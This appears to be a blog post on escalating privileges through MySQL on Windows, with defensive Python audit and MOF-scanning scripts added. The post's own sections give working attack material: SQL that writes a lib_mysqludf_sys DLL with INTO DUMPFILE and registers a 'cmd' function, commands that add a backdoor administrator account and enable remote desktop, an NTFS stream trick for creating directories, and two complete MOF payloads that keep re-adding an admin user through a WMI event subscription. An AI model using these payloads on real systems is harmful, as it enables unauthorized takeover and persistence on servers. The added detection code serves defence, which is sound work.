1. UDF privilege escalation via sqlmap
1. Find a writable directory and upload lib_mysqludf_sys.dll; depending on the MySQL version, export it into windows\system32 or into MySQL's \lib\plugin directory:
select @@plugin_dir
select load_file('C:\\RECYCLER\\lib_mysqludf_sys.dll') into dumpfile 'C:\\windows\\system32\\lib_mysqludf_sys.dll'
2. Create the function and run commands through it:
create function cmd returns string soname 'lib_mysqludf_sys.dll';
select cmd('net user mrxt 123456 /add');
select cmd('net localgroup administrators mrxt /add');
select cmd('regedit /s C:\\3389.reg');
drop function cmd;
delete from mysql.func where name='cmd';
3. In some cases you get a "Can't open shared library" error; the DLL then has to be exported into the lib\plugin directory. If that directory does not exist, it can be created with the NTFS ADS stream trick:
select 'dll file' into dumpfile 'C:\\Program Files\\MySQL\\MySQL Server 5.1\\lib\\::$INDEX_ALLOCATION';        -- creates the lib directory
select 'dll file' into dumpfile 'C:\\Program Files\\MySQL\\MySQL Server 5.1\\lib\\plugin::$INDEX_ALLOCATION';  -- creates the plugin directory
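The UDF technique above only works when `INTO DUMPFILE` can write into `plugin_dir` and a shell-wrapping UDF can be registered in `mysql.func`. The following audit script is an added example written for this page (it is not part of the original post). It takes two snapshots a DBA can pull with ordinary queries, `SHOW VARIABLES WHERE Variable_name IN ('secure_file_priv', 'plugin_dir')` and `SELECT name, ret, dl FROM mysql.func`, and reports the conditions that make the technique possible. The sample snapshot, the finding codes and the list of shell UDF library names are constructed for the example.

```python
"""Audit a MySQL server's exposure to UDF dropping via INTO DUMPFILE.

Added example, not from the original post.  Input values are the rows of
  SHOW VARIABLES WHERE Variable_name IN ('secure_file_priv', 'plugin_dir')
  SELECT name, ret, dl FROM mysql.func
passed in as plain Python values so the check runs offline.
"""

# Library names of well-known command-execution UDFs (the post uses
# lib_mysqludf_sys.dll).  Constructed list; extend it for your environment.
SHELL_UDF_LIBS = {"lib_mysqludf_sys.dll", "lib_mysqludf_sys.so"}


def _norm(path):
    """Normalise a path so Windows and POSIX spellings compare equal."""
    return path.replace("\\", "/").rstrip("/").lower()


def _basename(path):
    return _norm(path).rsplit("/", 1)[-1]


def audit_udf_exposure(variables, func_rows):
    """Return a list of (code, detail) findings; an empty list means nothing was flagged."""
    findings = []
    sfp = variables.get("secure_file_priv")
    plugin_dir = variables.get("plugin_dir", "")

    # 1. Can INTO DUMPFILE write anywhere the service account can, plugin_dir included?
    if sfp is None or sfp == "":
        findings.append(("SECURE_FILE_PRIV_EMPTY",
                         "LOAD_FILE/INTO DUMPFILE may read or write any path the "
                         "MySQL service account can reach"))
    elif sfp.upper() != "NULL" and (_norm(plugin_dir) == _norm(sfp)
                                    or _norm(plugin_dir).startswith(_norm(sfp) + "/")):
        # secure_file_priv is set, but plugin_dir sits inside it, so SQL can still
        # drop a library where CREATE FUNCTION will load it.
        findings.append(("PLUGIN_DIR_WRITABLE_VIA_SQL",
                         "plugin_dir %s lies inside secure_file_priv %s" % (plugin_dir, sfp)))

    # 2. Which UDFs are registered, and do any of them wrap an OS shell?
    for name, _ret, dl in func_rows:
        if _basename(dl) in SHELL_UDF_LIBS:
            findings.append(("SHELL_UDF_REGISTERED",
                             "function %s loads %s (OS command execution)" % (name, dl)))
        else:
            findings.append(("UDF_REVIEW",
                             "function %s loads %s; confirm it is expected" % (name, dl)))
    return findings


# Constructed sample snapshot: a Windows MySQL 5.1 install with file export
# unrestricted and the function from the post still registered.
SAMPLE_VARIABLES = {
    "secure_file_priv": "",
    "plugin_dir": "C:\\Program Files\\MySQL\\MySQL Server 5.1\\lib\\plugin\\",
}
SAMPLE_FUNC_ROWS = [
    ("cmd", 0, "lib_mysqludf_sys.dll"),
]

if __name__ == "__main__":
    for code, detail in audit_udf_exposure(SAMPLE_VARIABLES, SAMPLE_FUNC_ROWS):
        print(code, "-", detail)
```

A server where `secure_file_priv` is `NULL` (file import/export disabled) or points at a directory that does not contain `plugin_dir`, and whose `mysql.func` table is empty, produces no findings. The other hardening the script cannot see from SQL alone is filesystem ACLs: the account the MySQL service runs under should not be able to write to `plugin_dir` or `system32` at all.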
2. MOF privilege escalation
Find a writable directory and upload the MOF file there, for example C:\RECYCLER\
This payload uses WScript.Shell:
#pragma namespace("\\\\.\\root\\subscription")
instance of __EventFilter as $EventFilter
{
    EventNamespace = "Root\\Cimv2";
    Name = "filtP2";
    Query = "Select * From __InstanceModificationEvent "
            "Where TargetInstance Isa \"Win32_LocalTime\" "
            "And TargetInstance.Second = 5";
    QueryLanguage = "WQL";
};
instance of ActiveScriptEventConsumer as $Consumer
{
    Name = "consPCSV2";
    ScriptingEngine = "JScript";
    ScriptText = "var WSH = new ActiveXObject(\"WScript.Shell\")\nWSH.run(\"net.exe user mrxt 123456 /add\")";
};
instance of __FilterToConsumerBinding
{
    Consumer = $Consumer;
    Filter = $EventFilter;
};
This payload uses Shell.Users:
#pragma namespace("\\\\.\\root\\subscription")
instance of __EventFilter as $EventFilter
{
    EventNamespace = "Root\\Cimv2";
    Name = "filtP2";
    Query = "Select * From __InstanceModificationEvent "
            "Where TargetInstance Isa \"Win32_LocalTime\" "
            "And TargetInstance.Second = 5";
    QueryLanguage = "WQL";
};
instance of ActiveScriptEventConsumer as $Consumer
{
    Name = "consPCSV2";
    ScriptingEngine = "JScript";
    ScriptText = "var WSH = new ActiveXObject(\"Shell.Users\")\nz=WSH.create(\"NewUser\")\nz.changePassword(\"123456\", \"\")\nz.setting(\"AccountType\")=3";
};
instance of __FilterToConsumerBinding
{
    Consumer = $Consumer;
    Filter = $EventFilter;
};
Then export it into the c:/windows/system32/wbem/mof/ directory:
select load_file('C:\\wmpub\\nullevt.mof') into dumpfile 'c:\\windows\\system32\\wbem\\mof\\nullevt.mof'
This method keeps adding the user over and over; to stop it, run net stop winmgmt and then delete the file.
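Both MOF payloads above have the same shape: an `__EventFilter` on a timer-like WQL query, an `ActiveScriptEventConsumer` whose `ScriptText` instantiates a COM object, and an `__FilterToConsumerBinding` tying the two together. That shape is what a defender should look for. The scanner below is an added example written for this page (not from the original post): it parses MOF text for those three pieces, pulls the COM ProgIDs out of the script, and can walk a directory such as `%SystemRoot%\system32\wbem\mof`. The sample MOF documents, the `whoami.exe` command in the script and the helper names are constructed for the example.

```python
"""Flag MOF files that register a persistent, script-running WMI event subscription.

Added example, not from the original post.  Looks for the filter / consumer /
binding triple used by the payloads above and reports the COM objects the
consumer script creates.
"""
import os
import re

# Consumer classes that execute attacker-supplied content.  ActiveScriptEventConsumer
# is the one the post uses; CommandLineEventConsumer is the other common choice.
CONSUMER_CLASSES = {"ActiveScriptEventConsumer", "CommandLineEventConsumer"}

INSTANCE_RE = re.compile(r"instance\s+of\s+(\w+)", re.IGNORECASE)
# A MOF string literal: double-quoted, with backslash escapes inside.
SCRIPT_RE = re.compile(r'ScriptText\s*=\s*"((?:[^"\\]|\\.)*)"', re.IGNORECASE | re.DOTALL)
CMDLINE_RE = re.compile(r'CommandLineTemplate\s*=\s*"((?:[^"\\]|\\.)*)"', re.IGNORECASE | re.DOTALL)
ACTIVEX_RE = re.compile(r'ActiveXObject\("([^"]+)"\)')


def _unescape(mof_string):
    """Undo the two MOF escapes that matter for the script body."""
    return mof_string.replace('\\"', '"').replace("\\n", "\n")


def scan_mof(text):
    """Return a summary dict; 'suspicious' is True when a script- or command-running
    consumer is bound to an event filter in this MOF text."""
    classes = [m.group(1) for m in INSTANCE_RE.finditer(text)]
    consumers = [c for c in classes if c in CONSUMER_CLASSES]
    scripts = [_unescape(m.group(1)) for m in SCRIPT_RE.finditer(text)]
    commands = [_unescape(m.group(1)) for m in CMDLINE_RE.finditer(text)]
    com_objects = [p for s in scripts for p in ACTIVEX_RE.findall(s)]
    return {
        "classes": classes,
        "consumers": consumers,
        "scripts": scripts,
        "commands": commands,
        "com_objects": com_objects,
        "suspicious": ("__EventFilter" in classes
                       and "__FilterToConsumerBinding" in classes
                       and bool(consumers)),
    }


def scan_directory(path):
    """Scan every *.mof file directly under path; returns {filename: summary} for hits.
    MOF files on disk are often UTF-16; adjust the encoding if yours are."""
    hits = {}
    for entry in os.scandir(path):
        if entry.is_file() and entry.name.lower().endswith(".mof"):
            with open(entry.path, encoding="utf-8", errors="replace") as fh:
                summary = scan_mof(fh.read())
            if summary["suspicious"]:
                hits[entry.name] = summary
    return hits


# Constructed sample: same structure as the payloads above, with a harmless command.
SAMPLE_MOF = r'''
#pragma namespace("\\\\.\\root\\subscription")
instance of __EventFilter as $EventFilter
{
    EventNamespace = "Root\\Cimv2";
    Name = "filtExample";
    Query = "Select * From __InstanceModificationEvent "
            "Where TargetInstance Isa \"Win32_LocalTime\" "
            "And TargetInstance.Second = 5";
    QueryLanguage = "WQL";
};
instance of ActiveScriptEventConsumer as $Consumer
{
    Name = "consExample";
    ScriptingEngine = "JScript";
    ScriptText = "var WSH = new ActiveXObject(\"WScript.Shell\")\nWSH.run(\"whoami.exe\")";
};
instance of __FilterToConsumerBinding
{
    Consumer = $Consumer;
    Filter = $EventFilter;
};
'''

# Constructed sample: an ordinary class definition, which should not be flagged.
BENIGN_MOF = r'''
#pragma namespace("\\\\.\\root\\cimv2")
class Example_Setting
{
    [key] string Name;
    uint32 Value;
};
'''

if __name__ == "__main__":
    for label, doc in (("sample", SAMPLE_MOF), ("benign", BENIGN_MOF)):
        print(label, scan_mof(doc))
```

Scanning the `wbem\mof` directory only catches the drop-and-autocompile route, which relies on the MOF auto-compilation behaviour of Windows XP/2003; a subscription that is already compiled lives in the `root\subscription` namespace, so pair the file scan with a query of the live bindings, for example `Get-WmiObject -Namespace root\subscription -Class __FilterToConsumerBinding`, and treat any `ActiveScriptEventConsumer` there as worth explaining. `net stop winmgmt` plus deleting the file, as the post notes, is the cleanup for the autocompile case.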
References:
http://www.waitalone.cn/mysql-tiquan-summary.html
http://zone.wooyun.org/content/1795
http://www.exploit-db.com/exploits/23083/
Original URL: http://www.cnblogs.com/hackxt/p/4131124.html